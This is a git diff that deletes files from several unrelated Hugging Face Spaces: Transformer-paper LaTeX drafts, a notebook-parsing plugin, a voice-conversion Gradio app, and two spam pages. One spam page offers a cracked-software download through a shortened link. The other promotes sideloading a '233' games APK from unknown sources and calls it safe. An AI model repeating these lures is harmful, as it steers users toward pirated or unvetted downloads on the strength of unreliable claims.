draw global dependencies between input and output. The Transformer allows for significantly more parallelization and can reach a new state of the art in translation quality after being trained for as little as twelve hours on eight P100 GPUs. -%\marginpar{you removed the constant number of repetitions part. I wrote it because I wanted to make it clear that the model does not only perform attention once, while it's also not recurrent. I thought that might be important to get across early.} - -% Just a standard paragraph with citations, rewrite. -%After the seminal papers of \citep{sutskever14}, \citep{bahdanau2014neural}, and \citep{cho2014learning}, recurrent models have become the dominant solution for both sequence modeling and sequence-to-sequence transduction. Many efforts such as \citep{wu2016google,luong2015effective,jozefowicz2016exploring} have pushed the boundaries of machine translation and language modeling with recurrent sequence models. Recent effort \citep{shazeer2017outrageously} has combined the power of conditional computation with sequence models to train very large models for machine translation, pushing SOTA at lower computational cost. Recurrent models compute a vector of hidden states $h_t$, for each time step $t$ of computation. $h_t$ is a function of both the input at time $t$ and the previous hidden state $h_t$. This dependence on the previous hidden state encumbers recurrnet models to process multiple inputs at once, and their time complexity is a linear function of the length of the input and output, both during training and inference. [What I want to say here is that although this is fine during decoding, at training time, we are given both input and output and this linear nature does not allow the RNN to process all inputs and outputs simultaneously and haven't been used on datasets that are the of the scale of the web. What's the largest dataset we have ? . Talk about Nividia and possibly other's effors to speed up things, and possibly other efforts that alleviate this, but are still limited by it's comptuational nature]. Rest of the intro: What if you could construct the state based on the actual inputs and outputs, then you could construct them all at once. This has been the foundation of many promising recent efforts, bytenet,facenet (Also talk about quasi rnn here). Now we talk about attention!! Along with cell architectures such as long short-term meory (LSTM) \citep{hochreiter1997}, and gated recurrent units (GRUs) \citep{cho2014learning}, attention has emerged as an essential ingredient in successful sequence models, in particular for machine translation. In recent years, many, if not all, state-of-the-art (SOTA) results in machine translation have been achieved with attention-based sequence models \citep{wu2016google,luong2015effective,jozefowicz2016exploring}. Talk about the neon work on how it played with attention to do self attention! Then talk about what we do. \ No newline at end of file diff --git "a/spaces/f2api/gpt-academic/crazy_functions/\350\247\243\346\236\220JupyterNotebook.py" "b/spaces/f2api/gpt-academic/crazy_functions/\350\247\243\346\236\220JupyterNotebook.py" deleted file mode 100644 index b4bcd56109b42d3023f24eade7c0cd5671d3c5a4..0000000000000000000000000000000000000000 --- "a/spaces/f2api/gpt-academic/crazy_functions/\350\247\243\346\236\220JupyterNotebook.py" +++ /dev/null @@ -1,146 +0,0 @@ -from toolbox import update_ui -from toolbox import CatchException, report_execption, write_results_to_file -fast_debug = True - - -class PaperFileGroup(): - def __init__(self): - self.file_paths = [] - self.file_contents = [] - self.sp_file_contents = [] - self.sp_file_index = [] - self.sp_file_tag = [] - - # count_token - from request_llm.bridge_all import model_info - enc = model_info["gpt-3.5-turbo"]['tokenizer'] - def get_token_num(txt): return len( - enc.encode(txt, disallowed_special=())) - self.get_token_num = get_token_num - - def run_file_split(self, max_token_limit=1900): - """ - 将长文本分离开来 - """ - for index, file_content in enumerate(self.file_contents): - if self.get_token_num(file_content) < max_token_limit: - self.sp_file_contents.append(file_content) - self.sp_file_index.append(index) - self.sp_file_tag.append(self.file_paths[index]) - else: - from .crazy_utils import breakdown_txt_to_satisfy_token_limit_for_pdf - segments = breakdown_txt_to_satisfy_token_limit_for_pdf( - file_content, self.get_token_num, max_token_limit) - for j, segment in enumerate(segments): - self.sp_file_contents.append(segment) - self.sp_file_index.append(index) - self.sp_file_tag.append( - self.file_paths[index] + f".part-{j}.txt") - - - -def parseNotebook(filename, enable_markdown=1): - import json - - CodeBlocks = [] - with open(filename, 'r', encoding='utf-8', errors='replace') as f: - notebook = json.load(f) - for cell in notebook['cells']: - if cell['cell_type'] == 'code' and cell['source']: - # remove blank lines - cell['source'] = [line for line in cell['source'] if line.strip() - != ''] - CodeBlocks.append("".join(cell['source'])) - elif enable_markdown and cell['cell_type'] == 'markdown' and cell['source']: - cell['source'] = [line for line in cell['source'] if line.strip() - != ''] - CodeBlocks.append("Markdown:"+"".join(cell['source'])) - - Code = "" - for idx, code in enumerate(CodeBlocks): - Code += f"This is {idx+1}th code block: \n" - Code += code+"\n" - - return Code - - -def ipynb解释(file_manifest, project_folder, llm_kwargs, plugin_kwargs, chatbot, history, system_prompt): - from .crazy_utils import request_gpt_model_multi_threads_with_very_awesome_ui_and_high_efficiency - - if ("advanced_arg" in plugin_kwargs) and (plugin_kwargs["advanced_arg"] == ""): plugin_kwargs.pop("advanced_arg") - enable_markdown = plugin_kwargs.get("advanced_arg", "1") - try: - enable_markdown = int(enable_markdown) - except ValueError: - enable_markdown = 1 - - pfg = PaperFileGroup() - - for fp in file_manifest: - file_content = parseNotebook(fp, enable_markdown=enable_markdown) - pfg.file_paths.append(fp) - pfg.file_contents.append(file_content) - - # <-------- 拆分过长的IPynb文件 ----------> - pfg.run_file_split(max_token_limit=1024) - n_split = len(pfg.sp_file_contents) - - inputs_array = [r"This is a Jupyter Notebook file, tell me about Each Block in Chinese. Focus Just On Code." + - r"If a block starts with `Markdown` which means it's a markdown block in ipynbipynb. " + - r"Start a new line for a block and block num use Chinese." + - f"\n\n{frag}" for frag in pfg.sp_file_contents] - inputs_show_user_array = [f"{f}的分析如下" for f in pfg.sp_file_tag] - sys_prompt_array = ["You are a professional programmer."] * n_split - - gpt_response_collection = yield from request_gpt_model_multi_threads_with_very_awesome_ui_and_high_efficiency( - inputs_array=inputs_array, - inputs_show_user_array=inputs_show_user_array, - llm_kwargs=llm_kwargs, - chatbot=chatbot, - history_array=[[""] for _ in range(n_split)], - sys_prompt_array=sys_prompt_array, - # max_workers=5, # OpenAI所允许的最大并行过载 - scroller_max_len=80 - ) - - # <-------- 整理结果,退出 ----------> - block_result = " \n".join(gpt_response_collection) - chatbot.append(("解析的结果如下", block_result)) - history.extend(["解析的结果如下", block_result]) - yield from update_ui(chatbot=chatbot, history=history) # 刷新界面 - - # <-------- 写入文件,退出 ----------> - res = write_results_to_file(history) - chatbot.append(("完成了吗?", res)) - yield from update_ui(chatbot=chatbot, history=history) # 刷新界面 - -@CatchException -def 解析ipynb文件(txt, llm_kwargs, plugin_kwargs, chatbot, history, system_prompt, web_port): - chatbot.append([ - "函数插件功能?", - "对IPynb文件进行解析。Contributor: codycjy."]) - yield from update_ui(chatbot=chatbot, history=history) # 刷新界面 - - history = [] # 清空历史 - import glob - import os - if os.path.exists(txt): - project_folder = txt - else: - if txt == "": - txt = '空空如也的输入栏' - report_execption(chatbot, history, - a=f"解析项目: {txt}", b=f"找不到本地项目或无权访问: {txt}") - yield from update_ui(chatbot=chatbot, history=history) # 刷新界面 - return - if txt.endswith('.ipynb'): - file_manifest = [txt] - else: - file_manifest = [f for f in glob.glob( - f'{project_folder}/**/*.ipynb', recursive=True)] - if len(file_manifest) == 0: - report_execption(chatbot, history, - a=f"解析项目: {txt}", b=f"找不到任何.ipynb文件: {txt}") - yield from update_ui(chatbot=chatbot, history=history) # 刷新界面 - return - yield from ipynb解释(file_manifest, project_folder, llm_kwargs, plugin_kwargs, chatbot, history, system_prompt, ) diff --git a/spaces/failfast/2D-GameCreator/src/components/Codesandbox.tsx b/spaces/failfast/2D-GameCreator/src/components/Codesandbox.tsx deleted file mode 100644 index 69da1ea9a737609fa37efe393d7ec99c6f068e5c..0000000000000000000000000000000000000000 --- a/spaces/failfast/2D-GameCreator/src/components/Codesandbox.tsx +++ /dev/null @@ -1,25 +0,0 @@ -import axios from "axios"; -import CropSquareIcon from "@mui/icons-material/CropSquare"; -import IconButton from "@mui/material/IconButton"; -import Tooltip from "@mui/material/Tooltip"; -import { ShareProps } from "@/components/GameCreator"; - -export function Codesandbox({ title, content }: ShareProps) { - return ( - - { - const { data } = await axios.post("/api/url/codesandbox", { - content, - title, - }); - window.open(data, "_blank"); - }} - > - - - - ); -} diff --git a/spaces/falterWliame/Face_Mask_Detection/Alcohol 120 V2.0.3.7520 FINAL Crack [TechTools] Free Download BEST.md b/spaces/falterWliame/Face_Mask_Detection/Alcohol 120 V2.0.3.7520 FINAL Crack [TechTools] Free Download BEST.md deleted file mode 100644 index 1b0aa086dad1ba8ed66ca8161b522646b94a10d2..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Alcohol 120 V2.0.3.7520 FINAL Crack [TechTools] Free Download BEST.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Alcohol 120% V2.0.3.7520 FINAL Crack [TechTools] Free Download


    Download File ⚹⚹⚹ https://urlca.com/2uDcHz



    - -Alcohol 120% v2.0.3.7520 FINAL + Crack [TechTools].torrent .torrent. ... Activator (Crack) version 2 . ... user posted image /Download: Alcohol 120% 1.9.5.4521 + Crack ~ 6.3Mb ... Alcohol 120% Free Edition 2.0.3.6828 FE. 1fdad05405
    -
    -
    -

    diff --git a/spaces/fartsmellalmao/combined-GI-RVC-models/app-full.py b/spaces/fartsmellalmao/combined-GI-RVC-models/app-full.py deleted file mode 100644 index 74ce5c1b6dbe71dcc896de0b7809b6a32a884495..0000000000000000000000000000000000000000 --- a/spaces/fartsmellalmao/combined-GI-RVC-models/app-full.py +++ /dev/null @@ -1,499 +0,0 @@ -import os -import glob -import json -import traceback -import logging -import gradio as gr -import numpy as np -import librosa -import torch -import asyncio -import edge_tts -import yt_dlp -import ffmpeg -import subprocess -import sys -import io -import wave -from datetime import datetime -from fairseq import checkpoint_utils -from lib.infer_pack.models import ( - SynthesizerTrnMs256NSFsid, - SynthesizerTrnMs256NSFsid_nono, - SynthesizerTrnMs768NSFsid, - SynthesizerTrnMs768NSFsid_nono, -) -from vc_infer_pipeline import VC -from config import Config -config = Config() -logging.getLogger("numba").setLevel(logging.WARNING) -limitation = os.getenv("SYSTEM") == "spaces" - -audio_mode = [] -f0method_mode = [] -f0method_info = "" -if limitation is True: - audio_mode = ["Upload audio", "TTS Audio"] - f0method_mode = ["pm", "harvest"] - f0method_info = "PM is fast, Harvest is good but extremely slow. (Default: PM)" -else: - audio_mode = ["Input path", "Upload audio", "Youtube", "TTS Audio"] - f0method_mode = ["pm", "harvest", "crepe"] - f0method_info = "PM is fast, Harvest is good but extremely slow, and Crepe effect is good but requires GPU (Default: PM)" - -def create_vc_fn(model_title, tgt_sr, net_g, vc, if_f0, version, file_index): - def vc_fn( - vc_audio_mode, - vc_input, - vc_upload, - tts_text, - tts_voice, - f0_up_key, - f0_method, - index_rate, - filter_radius, - resample_sr, - rms_mix_rate, - protect, - ): - try: - if vc_audio_mode == "Input path" or "Youtube" and vc_input != "": - audio, sr = librosa.load(vc_input, sr=16000, mono=True) - elif vc_audio_mode == "Upload audio": - if vc_upload is None: - return "You need to upload an audio", None - sampling_rate, audio = vc_upload - duration = audio.shape[0] / sampling_rate - if duration > 20 and limitation: - return "Please upload an audio file that is less than 20 seconds. If you need to generate a longer audio file, please use Colab.", None - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - elif vc_audio_mode == "TTS Audio": - if len(tts_text) > 100 and limitation: - return "Text is too long", None - if tts_text is None or tts_voice is None: - return "You need to enter text and select a voice", None - asyncio.run(edge_tts.Communicate(tts_text, "-".join(tts_voice.split('-')[:-1])).save("tts.mp3")) - audio, sr = librosa.load("tts.mp3", sr=16000, mono=True) - vc_input = "tts.mp3" - times = [0, 0, 0] - f0_up_key = int(f0_up_key) - audio_opt = vc.pipeline( - hubert_model, - net_g, - 0, - audio, - vc_input, - times, - f0_up_key, - f0_method, - file_index, - # file_big_npy, - index_rate, - if_f0, - filter_radius, - tgt_sr, - resample_sr, - rms_mix_rate, - version, - protect, - f0_file=None, - ) - info = f"[{datetime.now().strftime('%Y-%m-%d %H:%M')}]: npy: {times[0]}, f0: {times[1]}s, infer: {times[2]}s" - print(f"{model_title} | {info}") - return info, (tgt_sr, audio_opt) - except: - info = traceback.format_exc() - print(info) - return info, (None, None) - return vc_fn - -def load_model(): - models = [] - with open(f"weights/model_info.json", "r", encoding="utf-8") as f: - models_info = json.load(f) - for character_name, info in models_info.items(): - if not info['enable']: - continue - model_title = info['title'] - model_name = info['model_path'] - model_author = info.get("author", None) - model_cover = f"weights/{character_name}/{info['cover']}" - model_index = f"weights/{character_name}/{info['feature_retrieval_library']}" - cpt = torch.load(f"weights/{character_name}/{model_name}", map_location="cpu") - tgt_sr = cpt["config"][-1] - cpt["config"][-3] = cpt["weight"]["emb_g.weight"].shape[0] # n_spk - if_f0 = cpt.get("f0", 1) - version = cpt.get("version", "v1") - if version == "v1": - if if_f0 == 1: - net_g = SynthesizerTrnMs256NSFsid(*cpt["config"], is_half=config.is_half) - else: - net_g = SynthesizerTrnMs256NSFsid_nono(*cpt["config"]) - model_version = "V1" - elif version == "v2": - if if_f0 == 1: - net_g = SynthesizerTrnMs768NSFsid(*cpt["config"], is_half=config.is_half) - else: - net_g = SynthesizerTrnMs768NSFsid_nono(*cpt["config"]) - model_version = "V2" - del net_g.enc_q - print(net_g.load_state_dict(cpt["weight"], strict=False)) - net_g.eval().to(config.device) - if config.is_half: - net_g = net_g.half() - else: - net_g = net_g.float() - vc = VC(tgt_sr, config) - print(f"Model loaded: {character_name} / {info['feature_retrieval_library']} | ({model_version})") - models.append((character_name, model_title, model_author, model_cover, model_version, create_vc_fn(model_title, tgt_sr, net_g, vc, if_f0, version, model_index))) - return models - -def cut_vocal_and_inst(url, audio_provider, split_model): - if url != "": - if not os.path.exists("dl_audio"): - os.mkdir("dl_audio") - if audio_provider == "Youtube": - ydl_opts = { - 'format': 'bestaudio/best', - 'postprocessors': [{ - 'key': 'FFmpegExtractAudio', - 'preferredcodec': 'wav', - }], - "outtmpl": 'dl_audio/youtube_audio', - } - with yt_dlp.YoutubeDL(ydl_opts) as ydl: - ydl.download([url]) - audio_path = "dl_audio/youtube_audio.wav" - else: - # Spotify doesnt work. - # Need to find other solution soon. - ''' - command = f"spotdl download {url} --output dl_audio/.wav" - result = subprocess.run(command.split(), stdout=subprocess.PIPE) - print(result.stdout.decode()) - audio_path = "dl_audio/spotify_audio.wav" - ''' - if split_model == "htdemucs": - command = f"demucs --two-stems=vocals {audio_path} -o output" - result = subprocess.run(command.split(), stdout=subprocess.PIPE) - print(result.stdout.decode()) - return "output/htdemucs/youtube_audio/vocals.wav", "output/htdemucs/youtube_audio/no_vocals.wav", audio_path, "output/htdemucs/youtube_audio/vocals.wav" - else: - command = f"demucs --two-stems=vocals -n mdx_extra_q {audio_path} -o output" - result = subprocess.run(command.split(), stdout=subprocess.PIPE) - print(result.stdout.decode()) - return "output/mdx_extra_q/youtube_audio/vocals.wav", "output/mdx_extra_q/youtube_audio/no_vocals.wav", audio_path, "output/mdx_extra_q/youtube_audio/vocals.wav" - else: - raise gr.Error("URL Required!") - return None, None, None, None - -def combine_vocal_and_inst(audio_data, audio_volume, split_model): - if not os.path.exists("output/result"): - os.mkdir("output/result") - vocal_path = "output/result/output.wav" - output_path = "output/result/combine.mp3" - if split_model == "htdemucs": - inst_path = "output/htdemucs/youtube_audio/no_vocals.wav" - else: - inst_path = "output/mdx_extra_q/youtube_audio/no_vocals.wav" - with wave.open(vocal_path, "w") as wave_file: - wave_file.setnchannels(1) - wave_file.setsampwidth(2) - wave_file.setframerate(audio_data[0]) - wave_file.writeframes(audio_data[1].tobytes()) - command = f'ffmpeg -y -i {inst_path} -i {vocal_path} -filter_complex [1:a]volume={audio_volume}dB[v];[0:a][v]amix=inputs=2:duration=longest -b:a 320k -c:a libmp3lame {output_path}' - result = subprocess.run(command.split(), stdout=subprocess.PIPE) - print(result.stdout.decode()) - return output_path - -def load_hubert(): - global hubert_model - models, _, _ = checkpoint_utils.load_model_ensemble_and_task( - ["hubert_base.pt"], - suffix="", - ) - hubert_model = models[0] - hubert_model = hubert_model.to(config.device) - if config.is_half: - hubert_model = hubert_model.half() - else: - hubert_model = hubert_model.float() - hubert_model.eval() - -def change_audio_mode(vc_audio_mode): - if vc_audio_mode == "Input path": - return ( - # Input & Upload - gr.Textbox.update(visible=True), - gr.Audio.update(visible=False), - # Youtube - gr.Dropdown.update(visible=False), - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False), - gr.Button.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Slider.update(visible=False), - gr.Audio.update(visible=False), - gr.Button.update(visible=False), - # TTS - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False) - ) - elif vc_audio_mode == "Upload audio": - return ( - # Input & Upload - gr.Textbox.update(visible=False), - gr.Audio.update(visible=True), - # Youtube - gr.Dropdown.update(visible=False), - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False), - gr.Button.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Slider.update(visible=False), - gr.Audio.update(visible=False), - gr.Button.update(visible=False), - # TTS - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False) - ) - elif vc_audio_mode == "Youtube": - return ( - # Input & Upload - gr.Textbox.update(visible=False), - gr.Audio.update(visible=False), - # Youtube - gr.Dropdown.update(visible=True), - gr.Textbox.update(visible=True), - gr.Dropdown.update(visible=True), - gr.Button.update(visible=True), - gr.Audio.update(visible=True), - gr.Audio.update(visible=True), - gr.Audio.update(visible=True), - gr.Slider.update(visible=True), - gr.Audio.update(visible=True), - gr.Button.update(visible=True), - # TTS - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False) - ) - elif vc_audio_mode == "TTS Audio": - return ( - # Input & Upload - gr.Textbox.update(visible=False), - gr.Audio.update(visible=False), - # Youtube - gr.Dropdown.update(visible=False), - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False), - gr.Button.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Slider.update(visible=False), - gr.Audio.update(visible=False), - gr.Button.update(visible=False), - # TTS - gr.Textbox.update(visible=True), - gr.Dropdown.update(visible=True) - ) - else: - return ( - # Input & Upload - gr.Textbox.update(visible=False), - gr.Audio.update(visible=True), - # Youtube - gr.Dropdown.update(visible=False), - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False), - gr.Button.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Slider.update(visible=False), - gr.Audio.update(visible=False), - gr.Button.update(visible=False), - # TTS - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False) - ) - -if __name__ == '__main__': - load_hubert() - models = load_model() - tts_voice_list = asyncio.get_event_loop().run_until_complete(edge_tts.list_voices()) - voices = [f"{v['ShortName']}-{v['Gender']}" for v in tts_voice_list] - with gr.Blocks() as app: - gr.Markdown( - "#
    Combined Genshin Impact RVC Models\n" - "##
    The input audio should be clean and pure voice without background music.\n" - "###
    It is recommended to use google colab for more features. \n" - "[![image](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/1Tgr6q9kKiB5P37rUitrB3CsNl8JP9iQZ?usp=sharing)\n\n" - "[![Original Repo](https://badgen.net/badge/icon/github?icon=github&label=Original%20Repo)](https://github.com/RVC-Project/Retrieval-based-Voice-Conversion-WebUI)" - ) - with gr.Tabs(): - for (name, title, author, cover, model_version, vc_fn) in models: - with gr.TabItem(name): - with gr.Row(): - gr.Markdown( - '
    ' - f'
    {title}
    \n'+ - f'
    RVC {model_version} Model
    \n'+ - (f'
    Model author: {author}
    ' if author else "")+ - (f'' if cover else "")+ - '
    ' - ) - with gr.Row(): - with gr.Column(): - vc_audio_mode = gr.Dropdown(label="Input voice", choices=audio_mode, allow_custom_value=False, value="Upload audio") - # Input and Upload - vc_input = gr.Textbox(label="Input audio path", visible=False) - vc_upload = gr.Audio(label="Upload audio file", visible=True, interactive=True) - # Youtube - vc_download_audio = gr.Dropdown(label="Provider", choices=["Youtube"], allow_custom_value=False, visible=False, value="Youtube", info="Select provider (Default: Youtube)") - vc_link = gr.Textbox(label="Youtube URL", visible=False, info="Example: https://www.youtube.com/watch?v=Nc0sB1Bmf-A", placeholder="https://www.youtube.com/watch?v=...") - vc_split_model = gr.Dropdown(label="Splitter Model", choices=["htdemucs", "mdx_extra_q"], allow_custom_value=False, visible=False, value="htdemucs", info="Select the splitter model (Default: htdemucs)") - vc_split = gr.Button("Split Audio", variant="primary", visible=False) - vc_vocal_preview = gr.Audio(label="Vocal Preview", visible=False) - vc_inst_preview = gr.Audio(label="Instrumental Preview", visible=False) - vc_audio_preview = gr.Audio(label="Audio Preview", visible=False) - # TTS - tts_text = gr.Textbox(visible=False, label="TTS text", info="Text to speech input") - tts_voice = gr.Dropdown(label="Edge-tts speaker", choices=voices, visible=False, allow_custom_value=False, value="en-US-AnaNeural-Female") - with gr.Column(): - vc_transform0 = gr.Number(label="Transpose", value=0, info='Type "12" to change from male to female voice. Type "-12" to change female to male voice') - f0method0 = gr.Radio( - label="Pitch extraction algorithm", - info=f0method_info, - choices=f0method_mode, - value="pm", - interactive=True - ) - index_rate1 = gr.Slider( - minimum=0, - maximum=1, - label="Retrieval feature ratio", - info="(Default: 0.6)", - value=0.6, - interactive=True, - ) - filter_radius0 = gr.Slider( - minimum=0, - maximum=7, - label="Apply Median Filtering", - info="The value represents the filter radius and can reduce breathiness.", - value=3, - step=1, - interactive=True, - ) - resample_sr0 = gr.Slider( - minimum=0, - maximum=48000, - label="Resample the output audio", - info="Resample the output audio in post-processing to the final sample rate. Set to 0 for no resampling", - value=0, - step=1, - interactive=True, - ) - rms_mix_rate0 = gr.Slider( - minimum=0, - maximum=1, - label="Volume Envelope", - info="Use the volume envelope of the input to replace or mix with the volume envelope of the output. The closer the ratio is to 1, the more the output envelope is used", - value=1, - interactive=True, - ) - protect0 = gr.Slider( - minimum=0, - maximum=0.5, - label="Voice Protection", - info="Protect voiceless consonants and breath sounds to prevent artifacts such as tearing in electronic music. Set to 0.5 to disable. Decrease the value to increase protection, but it may reduce indexing accuracy", - value=0.4, - step=0.01, - interactive=True, - ) - protect0 = gr.Slider( - minimum=0, - maximum=0.5, - label="Voice Protection", - info="Protect voiceless consonants and breath sounds to prevent artifacts such as tearing in electronic music. Set to 0.5 to disable. Decrease the value to increase protection, but it may reduce indexing accuracy", - value=0.5, - step=0.01, - interactive=True, - ) - with gr.Column(): - vc_log = gr.Textbox(label="Output Information", interactive=False) - vc_output = gr.Audio(label="Output Audio", interactive=False) - vc_convert = gr.Button("Convert", variant="primary") - vc_volume = gr.Slider( - minimum=0, - maximum=10, - label="Vocal volume", - value=4, - interactive=True, - step=1, - info="Adjust vocal volume (Default: 4}", - visible=False - ) - vc_combined_output = gr.Audio(label="Output Combined Audio", visible=False) - vc_combine = gr.Button("Combine",variant="primary", visible=False) - vc_convert.click( - fn=vc_fn, - inputs=[ - vc_audio_mode, - vc_input, - vc_upload, - tts_text, - tts_voice, - vc_transform0, - f0method0, - index_rate1, - filter_radius0, - resample_sr0, - rms_mix_rate0, - protect0, - ], - outputs=[vc_log ,vc_output] - ) - vc_split.click( - fn=cut_vocal_and_inst, - inputs=[vc_link, vc_download_audio, vc_split_model], - outputs=[vc_vocal_preview, vc_inst_preview, vc_audio_preview, vc_input] - ) - vc_combine.click( - fn=combine_vocal_and_inst, - inputs=[vc_output, vc_volume, vc_split_model], - outputs=[vc_combined_output] - ) - vc_audio_mode.change( - fn=change_audio_mode, - inputs=[vc_audio_mode], - outputs=[ - vc_input, - vc_upload, - vc_download_audio, - vc_link, - vc_split_model, - vc_split, - vc_vocal_preview, - vc_inst_preview, - vc_audio_preview, - vc_volume, - vc_combined_output, - vc_combine, - tts_text, - tts_voice - ] - ) - gr.Markdown('#
    Changelog 2023.06.28') - gr.Markdown('- Added Heizou-jp, Cyno-jp, Venti-jp, Chongyun-jp, Thoma-jp and Lumine-jp') - gr.Markdown('- Major fix and adjustment') - app.queue(concurrency_count=1, max_size=20, api_open=config.api).launch(share=config.colab) \ No newline at end of file diff --git a/spaces/fatiXbelha/sd/233 Playground How to Download and Play the Hottest Android Games.md b/spaces/fatiXbelha/sd/233 Playground How to Download and Play the Hottest Android Games.md deleted file mode 100644 index 203592292895b92a013d75d12b7238bcf4941b7f..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/233 Playground How to Download and Play the Hottest Android Games.md +++ /dev/null @@ -1,75 +0,0 @@ -
    -

    Download 233: What Is It and How to Use It?

    -

    If you are a fan of mobile games, you might have heard of download 233, a Chinese gaming platform that allows you to play millions of games without downloading or installing them. But what exactly is download 233 and how can you use it to enjoy your favorite games? In this article, we will answer these questions and show you how to download and use download 233 on your Android device.

    -

    Introduction

    -

    What is download 233?

    -

    Download 233 is a mobile gaming platform developed by MetaApp, a leading mobile game company in China. Download 233 provides access to over 2 million native games from various genres, such as casual, action, puzzle, simulation, and more. You can play any game you want with just one tap, without downloading or installing anything on your phone. Download 233 also offers monetization, localization, and user acquisition services for game developers who want to reach the Chinese market.

    -

    download 233


    DOWNLOAD --->>> https://urllie.com/2uNwu7



    -

    Why use download 233?

    -

    There are many benefits of using download 233 to play games on your phone. Here are some of them:

    -
      -
    • You can save storage space and data usage by not downloading or installing games.
    • -
    • You can discover new and high-quality games from all over the world.
    • -
    • You can enjoy fast and smooth gameplay with no lag or glitches.
    • -
    • You can switch between different games easily and quickly.
    • -
    • You can get personalized recommendations based on your preferences and behavior.
    • -
    -

    How to download and install download 233?

    -

    Step 1: Visit the official website or download the APK file

    -

    To use download 233, you need to have an Android device with Android version 4.4 or higher. You can either visit the official website of download 233 at www.233game.com or download the APK file from jalantikus.com. The APK file size is about 20 MB and it is safe and virus-free.

    -

    Step 2: Allow installation from unknown sources

    -

    Since download 233 is not available on Google Play Store, you need to enable installation from unknown sources on your phone settings. To do this, go to Settings > Security > Unknown Sources and toggle it on. This will allow you to install apps from sources other than Google Play Store.

    -

    Step 3: Install and launch the app

    -

    After you have downloaded the APK file, locate it on your phone's file manager and tap on it to start the installation process. Follow the instructions on the screen and wait for a few seconds until the app is installed. Then, launch the app by tapping on its icon on your home screen or app drawer.

    -

    How to use download 233 to play games?

    -

    Step 1: Browse or search for games

    -

    Once you have opened the app, you will see a variety of games displayed on the main screen. You can browse through different categories, such as daily discover, feature section, pre-order, casual, action, simulation, etc. You can also use the search bar at the top to find specific games by name or keyword.

    -

    Download 233 Playground APK for Android
    -Download 233 Leyuan app for Chinese mobile games
    -How to download 233 games on PC
    -Download 233 Sandbox game for free
    -Download 233 Fishing Season game online
    -Download 233 Gibbets: Bow Master game offline
    -Download 233 Carl the Super Truck Roadworks game for kids
    -Download 233 Genshin Impact game pre-order
    -Download 233 Call of Duty game for Windows
    -Download 233 Fall Guys: Ultimate Knockout game for Mac
    -Download 233 Mole Manor game for iOS
    -Download 233 League of Legends: Wild Rift game for Android
    -Download 233 The Painter is Time Traveler game for PC
    -Download 233 Cat Simulator: Kitty Craft game for Mac
    -Download 233 Goat War Battleground game for iOS
    -Download 233 Zombie Dawn Chernobyl game for Android
    -Download 233 Mission IGI: FPS Commando Free Shooting Games for Windows
    -Download 233 Zombie Shooter World War Star Battle Gun 3D FPS RPG for Mac
    -Download 233 Robot Battle Shadow of Dragon Fighters Force Ninja Battle Action game for iOS
    -Download 233 Animal Super Squad game for Android
    -Download 233 Ragdoll Rage: Heroes Arena game for PC
    -Download 233 Special Navy Warship Battle game for Mac
    -Download 233 Blocky American criminal gangster Rage Iron Tank Battle: Terrorist Strike Offroad Jeep Driving Parking Final Casual game for iOS
    -Download 233 Burger Cafe 2 Kinetic Sand Fun - ASMR Game Mr Cannon! Fruit Shake Master 2020 ZigZagged Super 3D Crowd Connect Crazy Game- Best Puzzle Kids Pregnant Talking Cat Emma Limp Zoo Snoring: Elephant Puzzle Glitter Slime Maker and Simulator - ASMR Car City: Kindergarden Toddler Learning Games My Virtual Pet Dog Louie the Pug Puzzle game for Android
    -Download 233 100 Doors Games 2020: Escape from School Monster Flow Catch the candy: remastered Spotlight: Room Escape Monsterland 2. Physics puzzle game Poly Mood - 3D puzzle sphere Girls Granny Makeup Salon & Dress up Party Pastel Doll Kimmy Superstar: Talking Fashion Cat Pixal Art Beard Barber Salon Mini-O Dash Simulator Oil Refinery Simulator - Construction Excavator Tuk Tuk Rickshaw Food Truck 3D Super Helicopter Shooting Simulator Underwater spearfishing 2017 Super 3D Airplane Flight Simulator-Pro Pilot Western Cowboy Gun Shooting Fighter Open World Special Piano : Video Game music songs Burger Horror Nights Story Commando Mission Critical Behind Enemy Lines Multi Robot Transforming : Wild Horse Police Car Spy Escape Prison Survival game for PC

    -

    Step 2: Tap on the game icon to start playing

    -

    When you find a game that interests you, simply tap on the game icon to start playing. You will see a loading screen for a few seconds and then the game will launch. You can play the game as long as you want without any interruption or limitation.

    -

    Step 3: Enjoy the game without downloading or installing

    -

    As you play the game, you will notice that the graphics and sound quality are excellent and the gameplay is smooth and fast. You will not experience any lag or glitches, even if you have a low-end device or a weak internet connection. You can also pause, resume, or exit the game at any time. You can also rate, review, or share the game with your friends.

    -

    Conclusion

    -

    Summary of the main points

    -

    Download 233 is a mobile gaming platform that lets you play millions of games without downloading or installing them. It is easy to use and offers many benefits, such as saving storage space and data usage, discovering new and high-quality games, enjoying fast and smooth gameplay, switching between different games easily and quickly, and getting personalized recommendations. All you need is an Android device with Android version 4.4 or higher and an internet connection.

    -

    Call to action and recommendation

    -

    If you are looking for a new and exciting way to play games on your phone, download 233 is the perfect choice for you. You can download it from www.233game.com or jalantikus.com and start playing right away. You will be amazed by how many games you can play with just one tap. Download 233 is the ultimate mobile gaming platform for gamers of all ages and preferences. Try it today and have fun!

    -

    FAQs

    -
      -
    • Q: Is download 233 free?
    • -
    • A: Yes, download 233 is completely free to use. You can play any game you want without paying anything.
    • -
    • Q: Is download 233 safe?
    • -
